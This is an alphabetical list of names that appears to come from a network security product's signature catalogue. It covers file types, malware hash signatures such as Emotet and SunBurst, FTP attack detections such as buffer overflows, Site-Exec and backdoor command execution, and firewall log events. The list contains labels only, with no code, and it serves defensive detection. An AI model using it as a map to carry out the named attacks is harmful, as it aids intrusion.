File_Apple-Binary-Property-List
File_Apple-BXDIFF
File_Apple-Connectivity-Test
File_Apple-Core-Audio-Format
File_Apple-Core-Data-Object-Model
File_Apple-DMG-Disk-Image
File_Apple-Installer-BOM
File_Apple-iOS-Application-Installation-Package
File_Apple-iOS-Firmware-Image
File_Apple-Pages-Document
File_Apple-Pages-Filename-Extension
File_Apple-PBZX-Package
File_Apple-Pict
File_Apple-QuickTime-Media
File_Apple-Vector-Map-Tile
File_Applix-Graphics
File_Ar-Archive
FILE_Archive-Checksum-Mismatch
FILE_Archive-Compression-Method-Unsupported
FILE_Archive-Decompression-Failed
FILE_Archive-Has-High-Compression-Ratio
FILE_Archive-Has-Trailing-Data
FILE_Archive-Potential-Denial-Of-Service-Attack
File_ARJ-Archive
File_ASPX
File_Autodesk-Autocad-DWF
File_Autodesk-Autocad-DWG
File_Autodesk-Autocad-DXF
File_Autodesk-Autocad-FAS
File_Autodesk-Flic-Video
File_Avast-AntiVirus-Filereputation-Update
File_Avast-AntiVirus-Update
File_Avg-AntiVirus-Update
File_Avira-AntiVirus-Update
File_Bad-Rabbit-Ransomware-Binary-MD5
File_Bad-Rabbit-Ransomware-Binary-SHA1
File_Batch-File
File_BIF-Video-Preview-Thumbnails
File_BitDefender-AntiVirus-Update
File_Bitmap-Image
File_BitTorrent-Metadata
File_Blizzard-BLTE
File_Blizzard-MPQ-Archive
File_Blocked
File_Blocked-Bad-SHA1-Hash
File_Blocked-Known-Bad-SHA1
File_Blocked-Known-Bad-SHA1-2
File_Blocked-Known-Bad-SHA1-Hash
File_BZip2-Compressed
File_Candy-Crush-Binary-MD5
File_Cascading-Style-Sheet
File_CD-ROM-Disk-Image
File_Cisco-Webex-Recording
File_Clamav-AntiVirus-Update
File_Commodore-Amiga-Disk-Image
File_Commodore-DOS-Disk-Image
File_Compress
File_Computer-Graphics-Metafile
File_Cryptonight-Miner-Binary-SHA1
File_Cyren-AntiVirus-Update
File_Debian-Binary-Installation-Package
File_Digmine-Cryptocurrency-Miner-Binary-SHA1
File_Disk-Masher-System-Image
File_DroidVPN-Binary-MD5
File_ELF-Executable
File_Embedded-OpenType-Font
File_Emotet-SHA1
File_Empty
FILE_Encrypted-Archive
File_Encrypted-Rar-Archive
File_Encrypted-Zip-Archive
File_Extended-M3U-Playlist
File_F-Prot-AntiVirus-Update
File_F-Secure-AntiVirus-Update
File_Favicon
File_Felismus-Malware-Binary-SHA1
File_FireEye-Red-Team-Tools-MD5
File_FireEye-Red-Team-Tools-SHA1
File_Flash-Video-Stream
File_Forcepoint-SMC-Log
File_Forcepoint-URL-Database-Update
File_Forcepoint-Web-Content-Gateway-Analytic-Feedback-Data
File_Generic-Interpreted-Script
File_Generic-OLE-Package
File_GIF-Filename-Extension
File_GIF-Image
File_Google-Chrome-CRX-Extension-Package
File_Google-Safesearch-Update
File_GPass-Binary-MD5
File_Gzip-Compressed
File_HakunaMatata-Ransomware-Binary-MD5
File_HakunaMatata-Ransomware-Binary-SHA1
File_Hidden-Cobra-APT-Binary-MD5
File_Hidden-Cobra-APT-Binary-SHA1
File_HTML
File_HTML-POST-Form-Data
File_HTTP-Injector-Binary-MD5
File_IBM-BigFix-Monitoring-File
File_IBM-BigFix-Site
File_IBM-OS2-Trace-Description
File_iCalendar
File_Interchange-File-Format
File_ISO-9660-Disk-Image
File_ISO-MPEG-4-Audio
File_ISO-MPEG-4-Audiobook
File_ISO-MPEG-4-Media
File_ISO-MPEG-4-Protected-Audio
File_ISO-MPEG-4-Protected-Video
File_ISO-MPEG-4-Video-Stream
File_Jaff-PDF-SHA1
File_Jaff-Ransomware-SHA1
File_Java-Archive
File_Java-Archive-Manifest
File_Java-Archive-Manifest-Filename
File_Java-Archive-Signature
File_Java-Archive-Signature-Filename
File_Java-Class
File_Java-WebStart
File_JavaScript
File_JPEG-Image
File_JSON
File_Kaspersky-AntiVirus-Update
File_LhArc-Archive
File_Linear-Executable-LE
File_Linear-Executable-LX
File_Lotus-1-2-3-Spreadsheet
File_Lz4-Archive
File_Mach-O-Executable
File_Malicious-File-From-Known-Exploit-SHA1
File_Malicious-PDF-Detected-based-on-SHA1
File_Malware-Blocked
File_Malware-Detected
File_Malware-MD5
File_Malware-SHA1
File_Matroska-Media-Container
File_McAfee-AntiVirus-Update
File_McAfee-ePolicy-Ochestrator-Update
File_Microsoft-ASF-Container
File_Microsoft-Cabinet-Archive
File_Microsoft-Control-Panel-Applet
File_Microsoft-Diagnostic-Cabinet-File
File_Microsoft-DirectDraw-Surface
File_Microsoft-Equation-Editor-Document
File_Microsoft-Excel-2002-XML-Document
File_Microsoft-Excel-2007-Binary-Spreadsheet
File_Microsoft-Excel-95-Spreadsheet
File_Microsoft-Excel-97-Spreadsheet
File_Microsoft-Excel-Legacy-Spreadsheet
File_Microsoft-Excel-Spreadsheet
File_Microsoft-Excel-XLS-Filename-Extension
File_Microsoft-Excel-XLSB-Filename-Extension
File_Microsoft-Excel-XLSX-Filename-Extension
File_Microsoft-Hyper-V-Disk-Image
File_Microsoft-Installer-Package
File_Microsoft-MS-DOS-Executable
File_Microsoft-NCSI
File_Microsoft-Office-2007-XML
File_Microsoft-Office-Open-XML-Document
File_Microsoft-Office-PrinterSettings
File_Microsoft-OLE
File_Microsoft-PlayReady-Content
File_Microsoft-PowerPoint-95-Presentation
File_Microsoft-PowerPoint-97-Add-In
File_Microsoft-PowerPoint-97-Presentation
File_Microsoft-PowerPoint-OLE-Slide
File_Microsoft-PowerPoint-PPT-Filename-Extension
File_Microsoft-Silverlight-Application-Manifest
File_Microsoft-Silverlight-Application-Package
File_Microsoft-Universal-Windows-App-Package
File_Microsoft-UWP-Application-Tile
File_Microsoft-Visio-Drawing
File_Microsoft-Windows-Compiled-Help
File_Microsoft-Windows-CVE-2017-0005-POC-MD5
File_Microsoft-Windows-Executable
File_Microsoft-Windows-Fax-Cover-Sheet
File_Microsoft-Windows-Help-Document
File_Microsoft-Windows-Media-HTTP-Stream
File_Microsoft-Windows-Memory-Dump
File_Microsoft-Windows-Metafile
File_Microsoft-Windows-Shortcut
File_Microsoft-Word-2003-XML-Document
File_Microsoft-Word-6-Document
File_Microsoft-Word-97-Document
File_Microsoft-Word-DOC-Filename-Extension
File_Microsoft-Word-For-Macintosh-Version-5-Document
File_Microsoft-Word-Legacy-Document
File_Microsoft-XVD-Package
File_Microsoft-XZP-Package
File_MIDI-Audio
File_Mime-Message
File_Mirai-Botnet-Binary-MD5
File_MMTLS-Data
File_Mozilla-Archive
File_MP3-Audio
File_MP3-Lyrics
File_MPEG-Transport-Stream
FILE_Nested-Archive-Limit-Reached
File_New-Executable
File_NTT-TwinVQ
File_OCSP-Request
File_Office-Open-XML-Application-Properties-Part
File_Office-Open-XML-Content-Type-Item
File_Office-Open-XML-Core-Properties-Part
File_Office-Open-XML-Custom-Properties-Part
File_Office-Open-XML-Package-Relations-Item
File_Office-Open-XML-Styles-Part
File_Office-Open-XML-Workbook-Part
File_Ogg
File_OneNote-Document
File_Open-Software-Description
File_OpenType-Filename-Extension
File_OpenType-Font
File_Oracle-VirtualBox-Disk-Image
File_PDF
File_PDF-Filename-Extension
File_Perl-Interpreted-Script
File_PGP-Message
File_PGP-Signature
File_PKI-Certificate
File_PKI-Certificate-Filename
File_PKI-Certificate-Revocation-List
File_PKI-Certificate-Revocation-List-Filename
File_PNG-Filename-Extension
File_PNG-Image
File_Proxy-Autoconfig
File_Psiphon-Binary-MD5
File_Python-Interpreted-Script
File_Quant-Loader-Trojan-Binary-SHA1
File_Range-Seen
File_Rar-Archive
File_Raw-Disk-Image
File_RealMedia-Video
File_RealNetworks-Internet-Video
File_Red-Hat-Binary-Installation-Package
File_RGB-Filename-Extension
File_RGB-Image
File_Rich-Site-Summary
File_RIFF
File_RigEK-Binary-MD5
File_Robots-Exclusion
File_Robots-Exclusion-Filename
File_Romfs-Disk-Image
File_RTF
File_Ruby-Interpreted-Script
File_SamSam1-Binary-SHA1
File_Satan-Ransomware-Binary-MD5
File_Self-Extracting-Zip-Archive
File_Snappy-Compressed
File_Sophos-AntiVirus-Update
File_Starloader-Malware-Binary-SHA1
File_StuffIt-Archive
File_SunBurst-Backdoor-MD5
File_SunBurst-Backdoor-SHA1
File_SVG
File_Symantec-AntiVirus-Update
File_Tango_Messenger-Binary-MD5
File_Tar-Archive
File_TeleDisk-Image
File_Text-IP-Address
File_Text-US-Ascii-Text-File
File_TIFF-Image
File_TiVo-Ty-Recording
File_TOR-Browser-Binary-MD5
File_TrickBot-Malware-SHA1
File_Triton-DDS-Query-Data
File_Triton-DDS-Response-Data
File_True-Type-Font
File_Type-Detection-Exception
File_Type-Unknown
File_Ultrasurf-Binary-MD5
File_UPnP-Device-Description
File_URSNIF-Malware-SHA1
File_UTF-Encoded-File
File_Valve-Steam-Data
File_Valve-Steam-Lan-Sync
File_Valve-Steam-Serverlist
File_vCalendar
File_Video-Ad-Serving-Template
File_Visual-Basic-Script-Filename
File_VMware-Disk-Image
File_VPNFilter-Binary-MD5
File_WAR-Archive
File_Waveform-Audio
File_Wcry-Ransomware-MD5
File_Weather.com-Data
File_WebP-Image
File_Webroot-BrightCloud-Category-Update
File_WebVTT
File_Windows-Imaging
File_Windows-Media-ASX
File_WOFF
File_Word-Perfect-Document
File_XAR-Archive
File_XML
File_XML-Signature
File_XPM
File_XSL
File_XZ-Archive
File_Your-Freedom-Binary-MD5
File_Zip-Archive
Finale-Inventory
Finalsite
Finance-Logix
Financeware.com
Financial Data and Services
FinancialForce
FinanzInformatik
Finario
Finch-Asset-Management
Fine-Art-America
FinestShops
Fing
Finger_0-Query
Finger_Cfingerd-User-Accounts-Disclosure
Finger_Command-Execution
Finger_Dot-User-Name-Disclosure
Finger_Fingerd-Bomb
Finger_Request-Redirection-Attempt
Finnish-Customs
Finnish-National-Archives-Service
Firebase
Firefox
Firefox Crashreporter
Firefox Installer
Firefox Plugin Container
Firefox Telemetry
Firefox Updater
Firefox-Captive-Portal-Test
Firefox-Update
FireText
Firmex
Firmwater-LMS
Firnass
First-Commonwealth-Federal-Credit-Union
First-Mortgage-Corp.
FirstdataCorp
FirstLook
Firstrade
FirstTech
Fischer-International
Fisglobal
Fishbowl
Fision
Fitbit
Fitzii---Predictive-Applicant-Tracking
Five-Hundred-Plus
Five9-Inc
Fiverr
Flabell
FLASH File
Flash-Appointments
Flash-Arcade
Flash-Games-247
FlashGet-HTTP
Flashtalking
Flava
Flavors.me
Fleep
FlexeraSoftware
FlexMMS
Flickr
Flickr-Upload
Flipdrive
Flipkart
flipsnack
Flite
Flixflux.com
Flixster
Flixwagon
Float-Schedule
Flow
Flow-Software
Flowdock
FlowPlayer
Flowroute
FluentCloud
FluidReview
Fluidsurveys
Flumotion
Flurry
Fluxiom
FlyDoc
Flyordie
Flyproxy
FM-Systems
FMI
FMI-Weather-Service
Fog-Creek-Copilot
Fogbugz
FogBugz-Online
Folding@home
Follett-Admin
Follow-Up-Boss
Folloze
Fonecta
Fonteva
Fonts.com
Foodspotting
Forbes
Forbidden_File_Type_Seen
Forcepoint
Forcepoint AMDP
Forcepoint DLP
Forcepoint ECA
Forcepoint Neo Endpoint
Forcepoint ONE
Forcepoint One Endpoint
Forcepoint ONE SmartEdge Agent
Forcepoint Support
Forcepoint Test Application: Anonymizers/Proxies
Forcepoint Test Application: Basic Internet Services
Forcepoint Test Application: Chat
Forcepoint Test Application: Discussion Forum
Forcepoint Test Application: ERP/CRM
Forcepoint Test Application: File Sharing
Forcepoint Test Application: Finance
Forcepoint Test Application: Games
Forcepoint Test Application: Health
Forcepoint Test Application: Hosting
Forcepoint Test Application: HR
Forcepoint Test Application: Infrastructure Services
Forcepoint Test Application: Mail
Forcepoint Test Application: Marketing
Forcepoint Test Application: Media
Forcepoint Test Application: Miscellaneous
Forcepoint Test Application: Office
Forcepoint Test Application: OPC Alarms and Events
Forcepoint Test Application: OPC Auxiliary
Forcepoint Test Application: OPC Data Access
Forcepoint Test Application: OPC Historical Data Access
Forcepoint Test Application: Orienteering
Forcepoint Test Application: P2P
Forcepoint Test Application: Photo/Video Sharing
Forcepoint Test Application: Reference
Forcepoint Test Application: Remote control
Forcepoint Test Application: Social Networking
Forcepoint Test Application: Statistics
Forcepoint Test Application: Storage
Forcepoint Test Application: Travel and Expense
Forcepoint Test Application: Tunneling
Forcepoint Test Application: Updates
Forcepoint Test Application: Web Mail
Forcepoint VPN Client
Forcepoint-CASB
Forcepoint-SMC-Update
Forcepoint_Drop
Forcify.Me
Foreca
Foreign-Policy
ForeScout SecureConnector
Foresee
FormAssembly
FormCrafts
FormExperts
Forms-on-the-Fly
FormSite
Formstack
Forrester
Forsythe
Fortiguard-Web-Filtering
Fortinet
Fortnite
Fortnox
Forward
Fotki
Fotobabble
Fotoflexer
Fotolia
Fotolog
Fotor
Foundation-3000
Four-Winds-Interactive
Four51
Foursquare
Fox-Learning
Fox-News
Fox.com
Foxit-Software-Update
Foxy.IO
FoxyUtils
Fpt-software
FrameFish-Virtual-Mirror
Frankfurter-Allgemeine
FRBO
Free
Free disk space on server reached alert threshold
Free-Online-Games
Free-PDF-Convert
Free-World-Group
Freeagent
Freecast
FreeConference
FreeConferenceCall.com
FreeConferenceCalling.com
FreeCRM
Freedom-Services
FreeDrive
Freeetv
FreeHostia
Freelotto
Freeonlinesurveys
FreePP
Freescale
FreeWebsite.com
FreeWheel
Freightquote
Frequentis
Freshbooks
Freshdesk
Frevvo
FriendFeed
Friendster
Friendvox
Front-App
FrontierSoftware
FrontRange
FrontStream
Fropper.com
Frosmo
FrozenMountain
Fruux
FSVps
FTI-Technology
Ftopia
FTP
FTP-Data-Port-out-of-Range
FTP-Validation-Succeeded
FTP_ACCT-Too-Long-Success
FTP_ADAT
FTP_ADAT-Argument-Too-Long-Success
FTP_ADAT-Success
FTP_ALLO-Too-Big-Success
FTP_AUTH
FTP_AUTH-Argument-Too-Long-Success
FTP_AUTH-Success
FTP_Carriage-Return-Nonnull
FTP_Carriage-Return-Nonnull-Success
FTP_CCC
FTP_CCC-Success
FTP_Characters-Invalid
FTP_Characters-Invalid-Success
FTP_Characters-Lower-Case
FTP_Characters-Mixed-Case
FTP_Characters-Numeric-Argument-Extra-Whitespace
FTP_Characters-Numeric-Argument-Extra-Whitespace-Success
FTP_Client-Stream-Success
FTP_Client-Syntax-Correct
FTP_CLNT
FTP_CLNT-Argument-Too-Long-Success
FTP_CLNT-Success
FTP_Command-Syntax-Incorrect
FTP_Command-Syntax-Incorrect-Success
FTP_Command-Unexpected
FTP_Command-Unexpected-Success
FTP_Command-Unknown
FTP_Command-Unknown-Success
FTP_Command-Whitespace-Before
FTP_Command-Whitespace-Before-Success
FTP_Command-Whitespace-No-Argument
FTP_Command-Whitespace-No-Argument-Success
FTP_Commands-Unprocessed-At-EOF
FTP_CONF
FTP_CONF-Argument-Too-Long-Success
FTP_CONF-Success
FTP_Connection-Data-Direction-Invalid
FTP_CS-Ability-Server-Stor-BOF
FTP_CS-Administrator-Login-Attempt
FTP_CS-AIX-BO-Libc-2
FTP_CS-AIX-Ftpd-BO-Libc
FTP_CS-Anonymous-Login-Attempt
FTP_CS-Attempted-FTP-Directory-Traversal
FTP_CS-Bash-Shellshock-Code-Injection
FTP_CS-Bash-Shellshock-Code-Injection-2
FTP_CS-Bin-Ls-BOF
FTP_CS-BOF-Cwd
FTP_CS-BOF-Mkd-5
FTP_CS-BOF-Mkd-6
FTP_CS-BOF-ProFTPD-2
FTP_CS-BOF-ProFTPD-3
FTP_CS-BOF-ProFTPD-Pro
FTP_CS-BolinTech-Dream-FTP-Server-Format-String
FTP_CS-BSD-Ftpd-Directory-Name-Buffer-Overflow
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-1
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-2
FTP_CS-Cd-BOF-Linux-Mkd
FTP_CS-Cesar-FTP-Mkd-Command-Buffer-Overflow
FTP_CS-Cisco-IOS-FTP-Mkd-BOF
FTP_CS-Cisco-IOS-FTP-Mkd-BOF-2
FTP_CS-Crob-RMD-Command-Buffer-Overflow
FTP_CS-Cwd-Home-Solaris-Information-Disclosure
FTP_CS-Cwd-Root-System-Compromise
FTP_CS-Cwd-With-Suspicious-Argument
FTP_CS-Default-IRIX-Account-4dgifts
FTP_CS-Default-IRIX-Account-Ezsetup
FTP_CS-Default-IRIX-Account-Guest
FTP_CS-Default-IRIX-Account-OutOfBox
FTP_CS-File-Globbing-Attack
FTP_CS-FileCOPA-List-Command-Buffer-Overflow
FTP_CS-FileZilla-FTP-Server-Denial-of-Service
FTP_CS-FreeBSD-BOF-Glob
FTP_CS-FreeBSD-BOF-Glob-2
FTP_CS-FreeBSD-BOF-Glob-3
FTP_CS-Freeftpd-User-Name-Buffer-Overflow
FTP_CS-GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow
FTP_CS-Golden-FTP-Server-RNTO-BOF
FTP_CS-Golden-FTP-Server-User-Command-BOF
FTP_CS-GuildFTPd-Remote-Buffer-Overflow
FTP_CS-Hd-Soft-Windows-FTP-Server-Format-Strings
FTP_CS-HTTPDX-TOLOG-Function-Format-String
FTP_CS-IIS-DoS-Wildcard
FTP_CS-IIS-Nlst-BOF
FTP_CS-Ipswitch-WS_FTP-Server-Command-Buffer-Overflow
FTP_CS-Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow
FTP_CS-Long-Dele-Command-Detection
FTP_CS-Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521
FTP_CS-Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow
FTP_CS-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow
FTP_CS-MKDIR-With-Suspicious-Argument
FTP_CS-mySCADA-myPRO-7-Hardcoded-Credentials
FTP_CS-Nessus-Vulnerability-Scanner-Usage
FTP_CS-Non-Ascii-Command-Argument
FTP_CS-Non-FTP-Protocol-Seen-In-FTP-Port
FTP_CS-Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow
FTP_CS-Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow
FTP_CS-Oversized-List-Argument
FTP_CS-Oversized-List-Argument-Buffer-Overflow
FTP_CS-Oversized-MKDIR-With-Suspicious-Argument
FTP_CS-Oversized-Nlst-Argument
FTP_CS-Oversized-Pass-With-Suspicious-Argument
FTP_CS-Oversized-Stat-Argument
FTP_CS-Oversized-Stat-With-Suspicious-Argument
FTP_CS-Oversized-User-Buffer-Overflow
FTP_CS-Password
FTP_CS-Pinkslip-Bot-Traffic
FTP_CS-ProFTPD-DoS-Stat
FTP_CS-ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
FTP_CS-ProFTPD-Mod-Copy-Arbitrary-File-Upload
FTP_CS-ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying
FTP_CS-ProFTPD-Snprintf
FTP_CS-ProFTPD-SReplace-Buffer-Overflow
FTP_CS-ProFTPD-User-SQL-Injection
FTP_CS-Retr-Directory-Traversal
FTP_CS-Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal
FTP_CS-Root-Login-Attempt
FTP_CS-Samsung-Data-Manager-Default-Root-Password
FTP_CS-Schneider-Electric-Ethernet-Module-Hardcoded-Credentials
FTP_CS-Serv-U-Cwd-BOF
FTP_CS-Serv-U-Directory-Traversal
FTP_CS-Serv-U-FTP-Server-Command-Buffer-Overflow
FTP_CS-Serv-U-List-Parameter-Buffer-Overrun
FTP_CS-Serv-U-MDTM-Command-Buffer-Overflow-1
FTP_CS-Serv-U-MDTM-Timezone-Buffer-Overflow
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-1
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-2
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-3
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-4
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-5
FTP_CS-Serv-U-Stou-Command-DoS
FTP_CS-Shared-Variables-For-Client-Stream-Context
FTP_CS-Shell-Command-Execution
FTP_CS-Site-Exec
FTP_CS-Site-Exec-7350wu
FTP_CS-Site-Exec-FreeBSD
FTP_CS-Site-Exec-FreeBSD-WU-FTPD
FTP_CS-Site-Exec-Lnx-Wu2600
FTP_CS-Site-Exec-Solaris-Sparc
FTP_CS-Site-Exec-WU-FTPD-Bobek
FTP_CS-Site-Exec-WU-Lnx
FTP_CS-Snake-Keylogger-Infection-Traffic
FTP_CS-Stor-To-Rhost
FTP_CS-Suspicious-Filename
FTP_CS-Suspicious-Format-String-Modifiers-In-FTP-Command
FTP_CS-System-AccountLogin-Attempt
FTP_CS-Telnet-Escape-Sequence
FTP_CS-Texas-Imperial-Software-Wftpd-Buffer-Overflow
FTP_CS-Titan-FTP-Server-Denial-Of-Service
FTP_CS-Tripwire-File-Name-Format-String
FTP_CS-Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow
FTP_CS-uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow
FTP_CS-Vandyke-Vshell-Server-Trigger-Command-Injection
FTP_CS-Very-Long-Self-Referencing-Path
FTP_CS-Victory-FTP-Server-Denial-Of-Service
FTP_CS-VSFTPD-Backdoor-Command-Execution
FTP_CS-War-Ftpd-User-Pass-BOF
FTP_CS-War-Ftpd-User-Pass-BOF-2
FTP_CS-Wftpd-Mkd-Cwd
FTP_CS-Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow
FTP_CS-Windows-Any-Ftpd-Retr-Get-DoS
FTP_CS-Windows-G6-Path-Disclosure
FTP_CS-Ws-FTP-Server-iFtpSvc-System-Compromise
FTP_CS-WS-FTP-Server-Multiple-Commands-BOF
FTP_CS-WS-FTP-Server-Multiple-Commands-Potential-BOF
FTP_CS-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow
FTP_CS-WU-FTPD-Fnmatch-Function-Asterisk-DoS
FTP_CS-WU-FTPD-Palmetto-BOF-Admwuftpd
FTP_CS-WU-FTPD-Palmetto-BOF-Bulba
FTP_CS-WU-FTPD-Palmetto-BOF-Duke
FTP_CS-WU-FTPD-Palmetto-BOF-Ftpwarez
FTP_CS-WU-FTPD-Palmetto-BOF-W00f
FTP_CS-WU-FTPD-Palmetto-BOF-Wh0a
FTP_CS-WU-FTPD-Palmetto-BOF-Wu30
FTP_CS-WU-FTPD-ProFTPD-Palmetto-BOF
FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-BSD
FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-Linux
FTP_CS-WU-FTPD-Site-Exec-Sh
FTP_CS-WU-FTPD-Site-Newer-Command-Execution
FTP_CS-WU-FTPD-Use-Compress
FTP_CS-WzdFTPD-Site-Command-Remote-Command-Execution
FTP_CS-XLink-FTP-Server-Buffer-Overflow
FTP_CS-XM-Easy-Personal-FTP-Server-Nlst-DoS
FTP_DI-Gnu-Wget-FTP-Remote-File-Creation
FTP_DI-Php-FTP_genlist-Method-Integer-Overflow
FTP_DL-Executable-File-Download
FTP_DL-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
FTP_DL-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
FTP_Download-RETR-Command
FTP_Download-RETR-Command-Success
FTP_ENC
FTP_ENC-Argument-Too-Long-Success
FTP_ENC-Success
FTP_EPRT
FTP_EPRT-Argument-Too-Long-Success
FTP_EPRT-Success
FTP_EPSV
FTP_EPSV-Success
FTP_EPSV-Too-Big
FTP_EPSV-Too-Big-Success
FTP_Error-Internal
FTP_ESTA
FTP_ESTA-Success
FTP_ESTP
FTP_ESTP-Argument-Too-Long-Success
FTP_ESTP-Success
FTP_FEAT
FTP_FEAT-Success
FTP_Feature-Unimplemented
FTP_Feature-Unimplemented-Success
FTP_HELP-Argument-Too-Long-Success
FTP_HOST
FTP_HOST-Invalid
FTP_HOST-Success
FTP_LANG
FTP_LANG-Argument-Too-Long-Success
FTP_LANG-Success
FTP_LF-As-CRLF
FTP_LPRT
FTP_LPRT-Argument-Too-Long-Success
FTP_LPRT-Success
FTP_LPSV
FTP_LPSV-Success
FTP_MDTM
FTP_MDTM-Success
FTP_MIC
FTP_MIC-Argument-Too-Long-Success
FTP_MIC-Success
FTP_MLSD
FTP_MLSD-Success
FTP_MLST
FTP_MLST-Success
FTP_NLST
FTP_NLST-Success
FTP_OPTS
FTP_OPTS-Argument-Too-Long-Success
FTP_OPTS-Success
FTP_Oversized-ACCT-Argument
FTP_Oversized-ADAT-Argument
FTP_Oversized-ALLO-Argument
FTP_Oversized-AUTH-Argument
FTP_Oversized-CLNT-Argument
FTP_Oversized-CONF-Argument
FTP_Oversized-ENC-Argument
FTP_Oversized-EPRT-Argument
FTP_Oversized-ESTP-Argument
FTP_Oversized-HELP-Argument
FTP_Oversized-LANG-Argument
FTP_Oversized-LPRT-Argument
FTP_Oversized-MIC-Argument
FTP_Oversized-OPTS-Argument
FTP_Oversized-Password
FTP_Oversized-Pathname
FTP_Oversized-PBSZ-Arg
FTP_Oversized-Reply
FTP_Oversized-Reply-Line
FTP_Oversized-REST
FTP_Oversized-SITE-Argument
FTP_Oversized-Username
FTP_Parameter-Missing
FTP_Parameter-Missing-Success
FTP_Pass-Too-Long-Success
FTP_PASV-IP-Address-Mismatch
FTP_PASV-Unused
FTP_Pathname-Extension
FTP_Pathname-Extension-Success
FTP_Pathname-Too-Long-Success
FTP_PBSZ
FTP_PBSZ-Success
FTP_PBSZ-Too-Big-Success
FTP_Pipeline-Detected
FTP_Pipeline-Violation
FTP_PORT-IP-Address-Mismatch
FTP_PORT-IP-Address-Mismatch-Success
FTP_PROT
FTP_PROT-Success
FTP_Reply-Code-Conflict
FTP_Reply-Extra
FTP_Reply-Protected
FTP_Reply-Syntax-Incorrect
FTP_Reply-Unexpected
FTP_REST-Marker-Too-Long-Success
FTP_REST-Stream
FTP_REST-Stream-Success
FTP_Server-Syntax-Correct
FTP_SITE
FTP_SITE-Argument-Too-Long-Success
FTP_SITE-Success
FTP_Size-Command
FTP_SIZE-Success
FTP_SS-Administrator-Login-Failure
FTP_SS-Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow
FTP_SS-CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow
FTP_SS-Curl-Client-Error-BOF
FTP_SS-Failed-Login
FTP_SS-FlashGet-FTP-Pwd-Command-Stack-Buffer-Overflow
FTP_SS-FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow
FTP_SS-Ipswitch-WS_FTP-Client-Format-String-Vulnerability
FTP_SS-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption
FTP_SS-Phatbot-Trojan-Infection
FTP_SS-ProFTP-Banner-Remote-Buffer-Overflow
FTP_SS-ProFTPD-Anonymous-Access-Granted
FTP_SS-Shared-Variables
FTP_SS-Trellian-FTP-Client-Remote-Buffer-Overflow
FTP_SS-Vandyke-AbsoluteFTP-Buffer-Overflow
FTP_SS-Your-Freedom-FTP-Packet
FTP_State-Wrong-At-EOF
FTP_Synchronization-Lost
FTP_Telnet-Interrupt
FTP_Transfer-Data-Direction-Invalid
FTP_Transfer-Data-Premature
FTP_Transfer-Extra-Data
FTP_Transfer-Mode-Active
FTP_Transfer-Mode-Active-Success
FTP_Transfer-Mode-Default
FTP_Transfer-Mode-Default-Success
FTP_Transfer-Mode-Passive
FTP_Transfer-Mode-Passive-Success
FTP_Transfer-No-Data
FTP_UL-Excessively-Long-Asp-Include-File-Argument
FTP_UL-Executable-File-Upload
FTP_Upload-Command
FTP_Upload-Command-Success
FTP_USER-Too-Long-Success
Fubo.tv
FuelQuest
FUID_Cannot_connect
FUID_Connection_Restored
FUID_Diagnostic_Error
FUID_Diagnostic_Info
Fujisoft
Fujitsu
Full-Tilt-Poker
FullContact
Fulldls.com
FullStory
Fun-Trivia
FunBeat
Funbrain
Function-Point
Functionfox
Fundingroadmap
Fundtech
Funnel.io
Funny-or-Die
Funshion
Fusebill
Fusemail
Fusionio
FusionLive
FuturelabsCRM
Fuze
Fuze-Meeting
FW_Accounting-VPN-Traffic
FW_Authentication-Authentication-Failed
FW_Authentication-Authentication-Removed-From
FW_Authentication-Authentication-Server-Does-Not-Respond
FW_Authentication-Authentication-Service-Started
FW_Authentication-Authentication-Succeeded
FW_Authentication-Client-Connection-Failed
FW_Authentication-Client-initiated-Authentication-From
FW_Authentication-Debug
FW_Authentication-Error-In-Initialization
FW_Authentication-Error-In-Receiving-A-New-Configuration
FW_Authentication-Firewall-initiated-Authentication-To
FW_Authentication-Internal-Engine-Error
FW_Authentication-IPsec-Certificate-Authentication-From
FW_Authentication-IPsec-Client-Cfg-Download-Done
FW_Authentication-IPsec-Client-Cfg-Download-Failed
FW_Authentication-IPsec-Client-Cfg-Download-From
FW_Authentication-IPsec-Hybrid-Authentication-From
FW_Authentication-Kernel-Usertable
FW_Authentication-LDAP-Server-Does-Not-Respond
FW_Authentication-New-Configuration-Successfully-Installed
FW_Authentication-User-Domain-And-Authentication-Service
FW_Authentication-User-ID
FW_BBA-User-logged-in
FW_BBA-User-logged-out
FW_BBA-User-login-failed
FW_BBA-User-went-offline
FW_Cluster-Protocol-Cluster-Protocol-Authentication-Upgraded
FW_Cluster-Protocol-Cluster-Protocol-Debug
FW_Cluster-Protocol-Cluster-Protocol-Error
FW_Cluster-Protocol-Control-Queue-Is-Full
FW_Cluster-Protocol-Device-Not-IP-Capable
FW_Cluster-Protocol-Invalid-License
FW_Cluster-Protocol-No-Multicast-IP-Configured
